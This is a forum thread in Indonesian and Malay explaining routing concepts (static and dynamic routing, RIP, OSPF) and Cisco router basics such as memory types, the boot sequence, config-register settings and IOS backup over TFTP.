Jika sekedar menghubungkan 2 buah jaringan, sebenarnya anda juga dapat menggunakan pc berbasis windows NT atau linux. Dengan memberikan 2 buah network card dan sedikit setting, sebenarnya anda telah membuat router praktis. Namun tentunya dengan segala keterbatasannya.

Di pasaran sangat beragam merek router, antara lain baynetworks, 3com dan cisco. Modul kursus kita kali ini akan membahas khusus cisco. Mengapa ? karena cisco merupakan router yang banyak dipakai dan banyak dijadikan standar bagi produk lainnya.

Lebih jauh tentang routing

Data-data dari device yang terhubung ke Internet dikirim dalam bentuk datagram, yaitu paket data yang didefinisikan oleh IP. Datagram memiliki alamat tujuan paket data; Internet Protocol memeriksa alamat ini untuk menyampaikan datagram dari device asal ke device tujuan. Jika alamat tujuan datagram tersebut terletak satu jaringan dengan device asal, datagram langsung disampaikan kepada device tujuan tersebut. Jika ternyata alamat tujuan datagram tidak terdapat di jaringan yang sama, datagram disampaikan kepada router yang paling tepat (the best available router).

IP Router (biasa disebut router saja) adalah device yang melakukan fungsi meneruskan datagram IP pada lapisan jaringan. Router memiliki lebih dari satu antamuka jaringan (network interface) dan dapat meneruskan datagram dari satu antarmuka ke antarmuka yang lain. Untuk setiap datagram yang diterima, router memeriksa apakah datagram tersebut memang ditujukan ke dirinya. Jika ternyata ditujukan kepada router tersebut, datagram disampaikan ke lapisan transport.

Jika datagram tidak ditujukan kepada router tersebut, yang akan diperiksa adalah forwarding table yang dimilikinya untuk memutuskan ke mana seharusnya datagram tersebut ditujukan. Forwarding table adalah tabel yang terdiri dari pasangan alamat IP (alamat host atau alamat jaringan), alamat router berikut, dan antarmuka tempat keluar datagram.

Jika tidak menemukan sebuah baris pun dalam forwarding table yang sesuai dengan alamat tujuan, router akan memberikan pesan kepada pengirim bahwa alamat yang dimaksud tidak dapat dicapai. Kejadian ini dapat dianalogikan dengan pesan “kembali ke pengirim” pada pos biasa. Sebuah router juga dapat memberitahu bahwa dirinya bukan router terbaik ke suatu tujuan, dan menyarankan penggunaan router lain. Dengan ketiga fungsi yang terdapat pada router ini, host-host di Internet dapat saling terhubung.

Statik dan Dinamik

Secara umum mekanisme koordinasi routing dapat dibagi menjadi dua: routing statik dan routing dinamik. Pada routing statik, entri-entri dalam forwarding table router diisi dan dihapus secara manual, sedangkan pada routing dinamik perubahan dilakukan melalui protokol routing. Routing statik adalah pengaturan routing paling sederhana yang dapat dilakukan pada jaringan komputer. Menggunakan routing statik murni dalam sebuah jaringan berarti mengisi setiap entri dalam forwarding table di setiap router yang berada di jaringan tersebut.

Penggunaan routing statik dalam sebuah jaringan yang kecil tentu bukanlah suatu masalah; hanya beberapa entri yang perlu diisikan pada forwarding table di setiap router. Namun Anda tentu dapat membayangkan bagaimana jika harus melengkapi forwarding table di setiap router yang jumlahnya tidak sedikit dalam jaringan yang besar. Apalagi jika Anda ditugaskan untuk mengisi entri-entri di seluruh router di Internet yang jumlahnya banyak sekali dan terus bertambah setiap hari. Tentu repot sekali!

Routing dinamik adalah cara yang digunakan untuk melepaskan kewajiban mengisi entri-entri forwarding table secara manual. Protokol routing mengatur router-router sehingga dapat berkomunikasi satu dengan yang lain dan saling memberikan informasi routing yang dapat mengubah isi forwarding table, tergantung keadaan jaringannya. Dengan cara ini, router-router mengetahui keadaan jaringan yang terakhir dan mampu meneruskan datagram ke arah yang benar.

Interior Routing Protocol

Pada awal 1980-an Internet terbatas pada ARPANET, Satnet (perluasan ARPANET yang menggunakan satelit), dan beberapa jaringan lokal yang terhubung lewat gateway. Dalam perkembangannya, Internet memerlukan struktur yang bersifat hirarkis untuk mengantisipasi jaringan yang telah menjadi besar. Internet kemudian dipecah menjadi beberapa autonomous system (AS) dan saat ini Internet terdiri dari ribuan AS. Setiap AS memiliki mekanisme pertukaran dan pengumpulan informasi routing sendiri.

Protokol yang digunakan untuk bertukar informasi routing dalam AS digolongkan sebagai interior routing protocol (IRP). Hasil pengumpulan informasi routing ini kemudian disampaikan kepada AS lain dalam bentuk reachability information. Reachability information yang dikeluarkan oleh sebuah AS berisi informasi mengenai jaringan-jaringan yang dapat dicapai melalui AS tersebut dan menjadi indikator terhubungnya AS ke Internet. Penyampaian reachability information antar-AS dilakukan menggunakan protokol yang digolongkan sebagai exterior routing protocol (ERP).

IRP yang dijadikan standar di Internet sampai saat ini adalah Routing Information Protocol (RIP) dan Open Shortest Path First (OSPF). Di samping kedua protokol ini terdapat juga protokol routing yang bersifat proprietary tetapi banyak digunakan di Internet, yaitu Internet Gateway Routing Protocol (IGRP) dari Cisco System. Protokol IGRP kemudian diperluas menjadi Extended IGRP (EIGRP). Semua protokol routing di atas menggunakan metrik sebagai dasar untuk menentukan jalur terbaik yang dapat ditempuh oleh datagram. Metrik diasosiasikan dengan “biaya” yang terdapat pada setiap link, yang dapat berupa throughput (kecepatan data), delay, biaya sambungan, dan keandalan link.

I. Routing Information Protocol

RIP (akronim, dibaca sebagai rip) termasuk dalam protokol distance-vector, sebuah protokol yang sangat sederhana. Protokol distance-vector sering juga disebut protokol Bellman-Ford, karena berasal dari algoritma perhitungan jarak terpendek oleh R.E. Bellman, dan dideskripsikan dalam bentuk algoritma-terdistribusi pertama kali oleh Ford dan Fulkerson.

Setiap router dengan protokol distance-vector ketika pertama kali dijalankan hanya mengetahui cara routing ke dirinya sendiri (informasi lokal) dan tidak mengetahui topologi jaringan tempatnya berada. Router kemudia mengirimkan informasi lokal tersebut dalam bentuk distance-vector ke semua link yang terhubung langsung dengannya. Router yang menerima informasi routing menghitung distance-vector, menambahkan distance-vector dengan metrik link tempat informasi tersebut diterima, dan memasukkannya ke dalam entri forwarding table jika dianggap merupakan jalur terbaik. Informasi routing setelah penambahan metrik kemudian dikirim lagi ke seluruh antarmuka router, dan ini dilakukan setiap selang waktu tertentu. Demikian seterusnya sehingga seluruh router di jaringan mengetahui topologi jaringan tersebut.

Protokol distance-vector memiliki kelemahan yang dapat terlihat apabila dalam jaringan ada link yang terputus. Dua kemungkinan kegagalan yang mungkin terjadi adalah efek bouncing dan menghitung-sampai-tak-hingga (counting to infinity). Efek bouncing dapat terjadi pada jaringan yang menggunakan metrik yang berbeda pada minimal sebuah link. Link yang putus dapat menyebabkan routing loop, sehingga datagram yang melewati link tertentu hanya berputar-putar di antara dua router (bouncing) sampai umur (time to live) datagram tersebut habis.

Menghitung-sampai-tak-hingga terjadi karena router terlambat menginformasikan bahwa suatu link terputus. Keterlambatan ini menyebabkan router harus mengirim dan menerima distance-vector serta menghitung metrik sampai batas maksimum metrik distance-vector tercapai. Link tersebut dinyatakan putus setelah distance-vector mencapai batas maksimum metrik. Pada saat menghitung metrik ini juga terjadi routing loop, bahkan untuk waktu yang lebih lama daripada apabila terjadi efek bouncing..

RIP tidak mengadopsi protokol distance-vector begitu saja, melainkan dengan melakukan beberapa penambahan pada algoritmanya agar routing loop yang terjadi dapat diminimalkan. Split horizon digunakan RIP untuk meminimalkan efek bouncing. Prinsip yang digunakan split horizon sederhana: jika node A menyampaikan datagram ke tujuan X melalui node B, maka bagi B tidak masuk akal untuk mencapai tujuan X melalui A. Jadi, A tidak perlu memberitahu B bahwa X dapat dicapai B melalui A.

Untuk mencegah kasus menghitung-sampai-tak-hingga, RIP menggunakan metode Triggered Update. RIP memiliki timer untuk mengetahui kapan router harus kembali memberikan informasi routing. Jika terjadi perubahan pada jaringan, sementara timer belum habis, router tetap harus mengirimkan informasi routing karena dipicu oleh perubahan tersebut (triggered update). Dengan demikian, router-router di jaringan dapat dengan cepat mengetahui perubahan yang terjadi dan meminimalkan kemungkinan routing loop terjadi.

RIP yang didefinisikan dalam RFC-1058 menggunakan metrik antara 1 dan 15, sedangkan 16 dianggap sebagai tak-hingga. Route dengan distance-vector 16 tidak dimasukkan ke dalam forwarding table. Batas metrik 16 ini mencegah waktu menghitung-sampai-tak-hingga yang terlalu lama. Paket-paket RIP secara normal dikirimkan setiap 30 detik atau lebih cepat jika terdapat triggered updates. Jika dalam 180 detik sebuah route tidak diperbarui, router menghapus entri route tersebut dari forwarding table. RIP tidak memiliki informasi tentang subnet setiap route. Router harus menganggap setiap route yang diterima memiliki subnet yang sama dengan subnet pada router itu. Dengan demikian, RIP tidak mendukung Variable Length Subnet Masking (VLSM).

RIP versi 2 (RIP-2 atau RIPv2) berupaya untuk menghasilkan beberapa perbaikan atas RIP, yaitu dukungan untuk VLSM, menggunakan otentikasi, memberikan informasi hop berikut (next hop), dan multicast. Penambahan informasi subnet mask pada setiap route membuat router tidak harus mengasumsikan bahwa route tersebut memiliki subnet mask yang sama dengan subnet mask yang digunakan padanya.

RIP-2 juga menggunakan otentikasi agar dapat mengetahui informasi routing mana yang dapat dipercaya. Otentikasi diperlukan pada protokol routing untuk membuat protokol tersebut menjadi lebih aman. RIP-1 tidak menggunakan otentikasi sehingga orang dapat memberikan informasi routing palsu. Informasi hop berikut pada RIP-2 digunakan oleh router untuk menginformasikan sebuah route tetapi untuk mencapai route tersebut tidak melewati router yang memberi informasi, melainkan router yang lain. Pemakaian hop berikut biasanya di perbatasan antar-AS.

RIP-1 menggunakan alamat broadcast untuk mengirimkan informasi routing. Akibatnya, paket ini diterima oleh semua host yang berada dalam subnet tersebut dan menambah beban kerja host. RIP-2 dapat mengirimkan paket menggunakan multicast pada IP 224.0.0.9 sehingga tidak semua host perlu menerima dan memproses informasi routing. Hanya router-router yang menggunakan RIP-2 yang menerima informasi routing tersebut tanpa perlu mengganggu host-host lain dalam subnet.

RIP merupakan protokol routing yang sederhana, dan ini menjadi alasan mengapa RIP paling banyak diimplementasikan dalam jaringan. Mengatur routing menggunakan RIP tidak rumit dan memberikan hasil yang cukup dapat diterima, terlebih jika jarang terjadi kegagalan link jaringan. Walaupun demikian, untuk jaringan yang besar dan kompleks, RIP mungkin tidak cukup. Dalam kondisi demikian, penghitungan routing dalam RIP sering membutuhkan waktu yang lama, dan menyebabkan terjadinya routing loop. Untuk jaringan seperti ini, sebagian besar spesialis jaringan komputer menggunakan protokol yang masuk dalam kelompok link-state

II. Open Shortest Path First (OSPF)

Teknologi link-state dikembangkan dalam ARPAnet untuk menghasilkan protokol yang terdistribusi yang jauh lebih baik daripada protokol distance-vector. Alih-alih saling bertukar jarak (distance) ke tujuan, setiap router dalam jaringan memiliki peta jaringan yang dapat diperbarui dengan cepat setelah setiap perubahan topologi. Peta ini digunakan untuk menghitung route yang lebih akurat daripada menggunakan protokol distance-vector. Perkembangan teknologi ini akhirnya menghasilkan protokol Open Shortest Path First (OSPF) yang dikembangkan oleh IETF untuk digunakan di Internet. Bahkan sekarang Internet Architecture Board (IAB) telah merekomendasikan OSPF sebagai pengganti RIP.

Prinsip link-state routing sangat sederhana. Sebagai pengganti menghitung route “terbaik” dengan cara terdistribusi, semua router mempunyai peta jaringan dan menghitung semua route yang terbaik dari peta ini. Peta jaringan tersebut disimpan dalam sebuah basis data dan setiap record dalam basis data tersebut menyatakan sebuah link dalam jaringan. Record-record tersebut dikirimkan oleh router yang terhubung langsung dengan masing-masing link.

Karena setiap router perlu memiliki peta jaringan yang menggambarkan kondisi terakhir topologi jaringan yang lengkap, setiap perubahan dalam jaringan harus diikuti oleh perubahan dalam basis data link-state yang terletak di setiap router. Perubahan status link yang dideteksi router akan mengubah basis data link-state router tersebut, kemudian router mengirimkan perubahan tersebut ke router-router lain.

Protokol yang digunakan untuk mengirimkan perubahan ini harus cepat dan dapat diandalkan. Ini dapat dicapai oleh protokol flooding. Dalam protokol flooding, pesan yang dikirim adalah perubahan dari basis data serta nomor urut pesan tersebut. Dengan hanya mengirimkan perubahan basis data, waktu yang diperlukan untuk pengiriman dan pemrosesan pesan tersebut lebih sedikit dibandingdengan mengirim seluruh isi basis data tersebut. Nomor urut pesan diperlukan untuk mengetahui apakah pesan yang diterima lebih baru daripada yang terdapat dalam basis data. Nomor urut ini berguna pada kasus link yang putus menjadi tersambung kembali.

Pada saat terdapat link putus dan jaringan menjadi terpisah, basis data kedua bagian jaringan tersebut menjadi berbeda. Ketika link yang putus tersebut hidup kembali, basis data di semua router harus disamakan. Basis data ini tidak akan kembali sama dengan mengirimkan satu pesan link-state saja. Proses penyamaan basis data pada router yang bertetangga disebut sebagai menghidupkan adjacency. Dua buah router bertetangga disebut sebagai adjacent bila basis data link-state keduanya telah sama. Dalam proses ini kedua router tersebut tidak saling bertukar basis data karena akan membutuhkan waktu yang lama.

Proses menghidupkan adjacency terdiri dari dua fasa.Fasa pertama, kedua router saling bertukar deskripsi basis data yang merupakan ringkasan dari basis data yang dimiliki setiap router. Setiap router kemudian membandingkan deskripsi basis data yang diterima dengan basis data yang dimilikinya. Pada fasa kedua, setiap router meminta tetangganya untuk mengirimkan record-record basis data yang berbeda, yaitu bila router tidak memiliki record tersebut, atau nomor urut record yang dimiliki lebih kecil daripada yang dikirimkan oleh deskripsi basis data. Setelah proses ini, router memperbarui beberapa record dan ini kemudian dikirimkan ke router-router lain melalui protokol flooding.

Protokol link-state lebih baik daripada protokol distance-vector disebabkan oleh beberapa hal: waktu yang diperlukan untuk konvergen lebih cepat, dan lebih penting lagi protokol ini tidak menghasilkan routing loop. Protokol ini mendukung penggunaan beberapa metrik sekaligus. Throughput, delay, biaya, dan keandalan adalah metrik-metrik yang umum digunakan dalam jaringan. Di samping itu protokol ini juga dapat menghasilkan banyak jalur ke sebuah tujuan. Misalkan router A memiliki dua buah jalur dengan metrik yang sama ke host B. Protokol dapat memasukkan kedua jalur tersebut ke dalam forwarding table sehingga router mampu membagi beban di antara kedua jalur tersebut.

Rancangan OSPF menggunakan protokol link-state dengan beberapa penambahan fungsi. Fungsi-fungsi yang ditambahkan antara lain mendukung jaringan multi-akses, seperti X.25 dan Ethernet, dan membagi jaringan yang besar mejadi beberapa area.

Telah dijelaskan di atas bahwa setiap router dalam protokol link-state perlu membentuk adjacency dengan router tetangganya. Pada jaringan multi-akses, tetangga setiap router dapat lebih dari satu. Dalam situasi seperti ini, setiap router dalam jaringan perlu membentuk adjacency dengan semua router yang lain, dan ini tidak efisien. OSPF mengefisienkan adjacency ini dengan memperkenalkan konsep designated router dan designated router cadangan. Semua router hanya perlu adjacent dengan designated router tersebut, sehingga hanya designated router yang adjacent dengan semua router yang lain. Designated router cadangan akan mengambil alih fungsi designated router yang gagal berfungsi.

Langkah pertama dalam jaringan multi-akses adalah memilih designated router dan cadangannya. Pemilihan ini dimasukkan ke dalam protokol Hello, protokol dalam OSPF untuk mengetahui tetangga-tetangga router dalam setiap link. Setelah pemilihan, baru kemudian router-router membentuk adjacency dengan designated router dan cadangannya. Setiap terjadi perubahan jaringan, router mengirimkan pesan menggunakan protokol flooding ke designated router, dan designated router yang mengirimkan pesan tersebut ke router-router lain dalam link.

Designated router cadangan juga mendengarkan pesan-pesan yang dikirim ke designated router. Jika designated router gagal, cadangannya kemudian menjadi designated router yang baru serta dipilih designated router cadangan yang baru. Karena designated router yang baru telah adjacent dengan router-router lain, tidak perlu dilakukan lagi proses penyamaan basis data yang membutuhkan waktu yang lama tersebut.

Dalam jaringan yang besar tentu dibutuhkan basis data yang besar pula untuk menyimpan topologi jaringan. Ini mengarah kepada kebutuhan memori router yang lebih besar serta waktu perhitungan route yang lebih lama. Untuk mengantisipasi hal ini, OSPF menggunakan konsep area dan backbone. Jaringan dibagi menjadi beberapa area yang terhubung ke backbone. Setiap area dianggap sebagai jaringan tersendiri dan router-router di dalamnya hanya perlu memiliki peta topologi jaringan dalam area tersebut. Router-router yang terletak di perbatasan antar area hanya mengirimkan ringkasan dari link-link yang terdapat dalam area dan tidak mengirimkan topologi area satu ke area lain. Dengan demikian, perhitungan route menjadi lebih sederhana.

Kesederhanaan vs. Kemampuan

Kita sudah lihat sepintas bagaimana RIP dan OSPF bekerja. Setiap protokol routing memiliki kelebihan dan kekurangannya masing-masing. Protokol RIP sangat sederhana dan mudah diimplementasikan tetapi dapat menimbulkan routing loop. Protokol OSPF merupakan protokol yang lebih rumit dan lebih baik daripada RIP tetapi membutuhkan memori dan waktu CPU yang besar.

Di berbagai tempat juga terdapat yang menggunakan gabungan antara routing statik, RIP, RIP-v2, dan OSPF. Hasilnya di jaringan ini menunjukkan bahwa administrasi routing statik jauh lebih memakan waktu dibanding routing dinamik. Pengamatan pada protokol routing dinamik juga menunjukkan bahwa RIP menggunakan bandwidth yang lebih besar daripada OSPF dan semakin besar jaringan, bandwidth yang digunakan RIP bertambah lebih besar pula. Jadi, jika Anda sedang mendesain jaringan TCP/IP yang besar tentu OSPF merupakan pilihan protokol routing yang tepat

Sumber : http://trilogy.wordpress.com , ditulis Oleh : yerianto@yahoo.com
Back to top
View user’s profile Send private message Visit poster’s website Yahoo Messenger
admin
Site Admin

Joined: 03 Aug 2007
Posts: 12

PostPosted: Fri Nov 02, 2007 3:05 am Post subject: Reply with quote
Pengenalan
Di dalam sesebuah rangkaian, data perlulah dihantar dan dikirim dengan tepat dan betul. Rangkaian komputer kompleks biasanya terdiri daripada koleksi LAN yang dijalinkan antara satu sama lain. Kerja-kerja mengirim ini dilaksanakan oleh router di mana router akan mengambil mesej data dari LAN dan menukarkannya kepada paket yang sesuai untuk dihantarkan ke LAN yang satu lagi (Lihat gambar1).

gambar 1: Rangkaian yang menggunakan perantara Router

Fungsi Router
Router berfungsi sebagai sebuah alat penghubung di antara rangkaian yang berlainan. Semasa paket dihantar, router akan menjalankan beberapa proses penting antaranya ialah: membuat terjemahan protokol, mengemaskini jadual haluan, mengirim paket, membungkus paket dan membuka bungkusan paket. Selain itu juga router berperanan untuk menapis trafik dengan membenarkan paket tertentu sahaja. Ini membolehkannya bertindak sebagai alat pelindung ringkas bagi rangkaian anda.

Berikut adalah beberapa kelebihan router:

* Menghubungkan dua atau lebih rangkaian untuk membentuk satu rangkaian
internetwork.

* Menghubungkan dua rangkaian yang berlainan protokol.

* Mengawal keselamatan rangkaian dengan membuat tapisan pada paket.

Jenis-jenis Router

Asas PC
Setiap sistem operasi sama ada Windows mahupun Linux menyokong fungsi routing terbina dalam. Jika anda mengaktifkan Internet Connection Sharing (ICS) di dalam Windows, anda telah menjadikan komputer anda sebagai sebuah router ringkas. Begitu juga dengan Linux yang boleh bertindak sebagai router IP atau IPX.

Oleh kerana ia ringkas, maka kebolehannya juga terbatas. Lihat gambarah (gambar 2) di bawah ini di mana sebuah PC dijadikan sebagai get laluan (gateway) untuk membenarkan setiap PC di dalam LAN tersebut berkongsi satu talian Internet.

gambar 2: Router asas-PC yang bertindak sebagai get laluan (gateway)

Blackbox
Router blackbox ialah sebuah peranti yang berupa sebuah kotak khas. Router jenis ini mempunyai beberapa kelebihan berbanding router PC-based. Router ini biasanya berkemampuan untuk melaksanakan undang-undang (rules) keselamatan bagi melindungi rangkaian dari serangan luar. Router jenis ini juga mampu untuk menampung beban trafik yang berat kerana ia merupakan sebuah peranti yang bertindak bersendirian. Oleh kerana ia bertindak sendirian, maka ia menggunakan mikropemproses RISC dan lebih laju berbanding PC biasa. gambar 3 di bawah menunjukkan sebuah contoh router jenis blackbox.

gambar 3: Linksys DSL Router Model BEFSR41

Ciri-ciri Router
Router jenis blackbox sebenarnya ialah sebuah mesin komputer. Ia memiliki ciri-ciri sepertimana yang digunakan oleh PC: ia mempunyai CPU, memori, dan juga input-output. Cuma bezanya ialah router jenis ini tidak memiliki cakera keras, tiada pemacu cakera liut, dan juga pemacu CD-ROM. Namun begitu router ini mempunyai pelbagai jenis storan lain seperti kad memori Flash.

Memori
Terdapat beberapa jenis memori yang digunakan oleh router blackbox, antaranya ialah: RAM, NVRAM, Flash dan ROM (PROM, EEPROM)

ROM digunakan untuk menyimpan perisian bootstrap manakala NVRAM pula menyimpan konfigurasi startup yang digunakan oleh sistem operasi router. Memori Flash pula menyimpan sistem operasi seperti IOS dan lain-lain jenis sistem operasi.

Perisian
Sama seperti PC, router blackbox akan melaksanakan program-program kawalan atau sistem operasi (OS). Setiap pengeluar router akan membekalkan sistem operasi mereka sendiri.

Konfigurasi startup yang tersimpan di dalam NVRAM akan dilaksanakan sebaik sahaja router dihidupkan. Semasa proses but, satu salinan konfigurasi akan dimuatkan ke dalam RAM. Apabila berlakunya sebarang perubahan data pada konfigurasi ini, RAM akan memberi kesan dengan serta merta.

Router beroperasi dengan melaksanakan sejumlah besar proses yang terdiri daripada pelbagai jenis servis dan protokol. Router menyokong arahan untuk memaparkan maklumat tentang proses yang sedang berjalan dan sumber resources seperti penggunaan CPU dan memori. Servis dan kemudahan yang tidak diperlukan boleh dimatikan untuk mengelakkan penggunaan CPU dan memori yang berlebihan.

Setiap router mempunyai nama yang unik bagi memudahkan ia dikenalpasti di dalam rangkaian. Oleh yang demikian, router juga akan mempunyai alamat IPnya tersendiri.
Back to top
View user’s profile Send private message Send e-mail
epol_17

Joined: 24 Oct 2007
Posts: 14

PostPosted: Sat Nov 03, 2007 3:55 am Post subject: Re: tentnag router????? Reply with quote
menurut saya :

Router adalah sebuah alat jaringan komputer yang mengirimkan paket data melalui sebuah jaringan atau Internet menuju tujuannya, melalui sebuah proses yang dikenal sebagai routing. Proses routing terjadi pada lapisan 3 (Lapisan jaringan seperti Internet Protocol) dari stack protokol tujuh-lapis OSI.
Router adalah sebuah device yang berfungsi untuk meneruskan paket-paket dari sebuah network ke network yang lainnya (baik LAN ke LAN atau LAN ke WAN) sehingga host-host yang ada pada sebuah network bisa berkomunikasi dengan host-host yang ada pada network yang lain. Router menghubungkan network-network tersebut pada network layer dari model OSI, sehingga secara teknis Router adalah Layer 3 Gateway.

Fungsi Router sebagai sebuah alat penghubung di antara rangkaian yang berlainan. Semasa paket dihantar, router akan menjalankan beberapa proses penting antaranya ialah: membuat terjemahan protokol, mengemaskini jadual haluan, mengirim paket, membungkus paket dan membuka bungkusan paket. Selain itu juga router berperanan untuk menapis trafik dengan membenarkan paket tertentu sahaja. Ini membolehkannya bertindak sebagai alat pelindung ringkas bagi rangkaian anda.
Router berfungsi sebagai penghubung antar dua atau lebih jaringan untuk meneruskan data dari satu jaringan ke jaringan lainnya. Router berbeda dengan switch. Switch merupakan penghubung beberapa alat untuk membentuk suatu Local Area Network (LAN).

Sebuah Cisco router, seperti layaknya PC yang ber Operating System(OS), tidak bisa beroperasi tanpa Cisco Internetworking Operating System(IOS). Untuk pemahaman dalam pengaturan IOS Cisco, penulis mencoba untuk mengsistimasikan bahan ini dalam tiga topik dasar : Jenis Memory pada Standard Cisco Router, Prosedur dan Konfigurasi Boot , dan Pengaturan Image IOS & Config File.Cisco Router Memory

Berikut penjabaran singkat mengenai jenis-jenis memory pada tipikal router. Pikirkanlah router sebagai suatu mesin dengan bermacam-macam kontainer penampung(memory) dengan kegunaan yang berbeda-beda :

• ROM (Read-Only Memory) – start dan manage router

• Flash memory – menyimpan Cisco IOS . Tidak terhapus bila router di reload.

• NVRAM (non-volatile RAM) – menyimpan konfigurasi awal(startup config). Tidak terhapus bila router di reload.

• RAM (Random-Access Memory) – menyimpan buffer, cache, routing tables, juga software dan struktur konfigurasi yang berjalan (running config) untuk kinerja router. Terhapus bila router di reload

Prosedur dan Konfigurasi Boot

2.a. Prosedur Boot

Dengan macam-macam kegunaan memory-memory diatas, berikut penjelasan dasar proses boot:

1. Test hardware/POST oleh ROM = Pengecekan ROM dan test operasi hardware (CPU, memory, dan interfaces).

2. Bootstrap load oleh ROM = untuk mencari IOS

3. IOS dicari secara berurut dan di load satu diantara medium-medium berikut, dengan urutan :

a. Flash memory (default)

b. TFTP Server (external IOS, dari router/server luar)

c. ROM mengload Mini IOS(aka. RXBOOT / bootloader). Cisco IOS loaded.

4. Cisco IOS lalu mencari & mengload file konfigurasi dari, dengan urutan :

a. NVRAM (default)

b. TFTP Server (external IOS, dari router/server luar)

c. Console (konfigurasi secara manual)

urutanboot.JPG

Gb. 1 Urutan Boot

2.b. Konfigurasi Boot

Pencarian dan penloadan bisa juga dimodifikasi melalui register di router. Kegunaan dari register setting antara lain untuk akses ke mode prompt berbeda seperti:

- ROM Monitor(troubleshooting, manual booting),

- Mini-IOS(update, load IOS),

- Password Recovery (dengan meng-skip konfigurasi awal NVRAM), dll.

Semua Cisco router mempunyai 16-bit software register yang menuliskan settingnya di NVRAM. Secara default, dalam register, setting boot adalah “Configuration register 0×2102” — Mengload IOS dari Flash memory. Ini bisa dilihat dengan perintah show version dari prompt router.

Untuk merubah register :

Dari privileged mode (enable), masuk ke global configuration mode (configure terminal), lalu gunakan perintah config-register 0xnnnn (n dalam hexadesimal). Untuk menyingkatkan disini penulis hanya akan menuliskan beberapa konfigurasi register. Untuk info lebih mengenai register pada Cisco router, bisa di cari di situs dokumentasi Cisco: http://www.cisco.com/univercd/home/home.htm

2102 = load IOS from Flash * factory-default

0×2142 = untuk meng-ignore NVRAM

0×0 = boot ke ROM Monitor mode

0×1 = boot ke RXBoot/Mini IOS mode

uboot2.JPG

Gb.2 hasil perintah show version(sh ver) pada Cisco 2509

Selain dari global configuration mode, register bisa juga diubah dengan cara menginterrupt boot process dengan signal break (Ctrl+Break di HyperTerminal) selang 60 detik pertama proses boot. Anda akan memasuki mode ROM Monitor(rommon), ubahlah register dengan command : confreg 0xnnnn lalu reset – untuk Cisco 2600 series o/r 0xnnnn lalu i – untuk Cisco 2500 series

3. Pengaturan IOS image dan Config File

3.a. IOS Image

Pengaturan dasar IOS image mencakup back-up, restore. Ini dilakukan apabila IOS yang corrupt, atau peng-upgrade-an, dsb.

Note:

* Untuk backup dan restore biasanya diperlukan TFTP(Trivial FTP) network server yang telah di set dan menyediakan Cisco IOS image.

* Command-command berikut diperuntukkan IOS versi 12.0 kebawah, yang mungkin berfungsi pada versi 12.0 keatas walaupun sudah ada command yang baru.

Untuk back-up, perintah : copy flash tftp , dan ikuti instruksi Sebelum back-up pastikan:

- Anda memiliki akses/koneksi ke network server (pastikan dengan ping)

- Network server memiliki space yang cukup

- file naming dan path yang tepat.

Untuk restore, perintah : copy tftp flash, dan ikuti instruksi. Untuk penjelasan mengsetup TFTP Server bisa dicari di situs dokumentasi Cisco : http://www.cisco.com/univercd/home/home.htm >

http://www.cisco.com/univercd/cc/td/doc/product/access/multicon/3810soft/3810vct/tftpapp.htm

3.b. Config File

Lebih simple dari IOS image, berikut file konfigurasi dan relasinya ke memory:

Startup-Config > NVRAM * config ini yang diload saat router loaded

Running-Config > RAM * config yang dipakai/running

Untuk melihat file config file :

Show [ running-config | startup-config ]

Penggunaan command copy :

Copy [target]

Sebagai source dan target yaitu running-config, startup-config, atau tftp

Contoh:

copy running-config start-up

* mengkopi/menyimpan running-config (RAM) ke startup-config (NVRAM)

copy startup-config ke TFTP

*

mengkopi/menyimpan startup-config (NVRAM) ke TFTP Server

4. Kesimpulan

Pemahaman dasar atas pengaturan Cisco IOS Router, untuk password recovery, upgrade IOS, backup setting, dsb akan sangat berguna bagi siapa saja yang dalam sehari-harinya berurusan dengan perangkat keras yang satu ini. Juga berguna bagi mereka yang sedang mendalami kurikulum Cisco untuk mengambil sertifikasi

Memori yang digunakan oleh Router Cisco masing-masing mempunyai kegunaan sendiri-sendiri sebagai berikut :

1. ROM berguna untuk menyimpan sistem bootstrap yang berfungsi untuk mengatur proses boot dan menjalankan Power On Self Test (POST) dan IOS image.

2. RAM berguna untuk menyimpan running configuration dan sistem operasi IOS yang aktif.

3. NVRAM berguna untuk menyimpan konfigurasi awal (start-up configuration).

4. FLASH berguna untuk menyimpan IOS image. Dengan menggunakan FLASH, IOS versi baru dapat diperoleh dari TFTP server tanpa harus mengganti komponen dalam router.

1. Macam-Macam Router Cisco

Perusahaan Cisco membuat router dengan berbagai seri dan model untuk berbagai kelas atau tingkat penggunaan, seperti :

a. Router Cisco Tipe Fixed Tingkat Akses

1) Router Cisco 700 series

2) Router Cisco 801-804

3) Router Cisco 805

4) Router Cisco 811 dan 813

5) Router Cisco 827

6) Router Cisco 1000 series

7) Router Cisco 2000 series

Router Cisco 2500 series

9) Router Cisco 3000 series

b. Router Cisco Tipe Modular Tingkat Akses

1) Router Cisco 1600 series

2) Router Cisco 1720 dan 1750

3) Router Cisco 2500 series

4) Router Cisco 2600 series

5) Router Cisco 3600 series

6) Router Cisco 4000 series

c. Router Cisco Tipe Modular Tingkat Inti

1) Router Cisco 7000 series, untuk enterprise

2) Router Cisco 10000 dan 12000 series, untuk enterprise

Umumnya perusahaan Cisco memberikan nomor model dengan angka kecil seperti Router Cisco model 700 untuk jaringan WAN sederhana untuk dipakai oleh perusahaan kecil. Sedangkan nomor dengan angka yang besar seperti Router Cisco model 12000 digunakan untuk jaringan WAN kompleks yang dipakai oleh perusahaan besar. Router Cisco tipe fixed mempunyai interface tetap yang tidak dapat diganti-ganti sesuai dengan kebutuhan pemakai. Umumnya Router Cisco jenis modular harganya jauh lebih mahal, tetapi lebih fleksibel dalam penggunaanya. Router Cisco 2500 series tersedia dalam bentuk tipe fixed maupun modular. Setiap router biasanya mempunyai dua synchronous Serial port DB-60 (Serial0 dan Serial1) untuk hubungan WAN, satu ethernet port DB-15 (AUI) untuk hubungan LAN, satu console port RJ-45 untuk akses langsung ke sistem router dan satu auxiliary port RJ-45 (AUX) untuk akses ke sistem router dengan Modem.

Gambar 2.18

Contoh Router Cisco

contoh-router-cisco

Sumber : www.Cisco.com

2. Menghubungkan Router Cisco ke PC

Berbeda dengan komputer, Router Cisco tidak dapat dihubungkan langsung dengan suatu monitor atau keyboard. Akses langsung ke sistem Router Cisco harus melalui console port dengan perantaraan suatu terminal atau komputer.

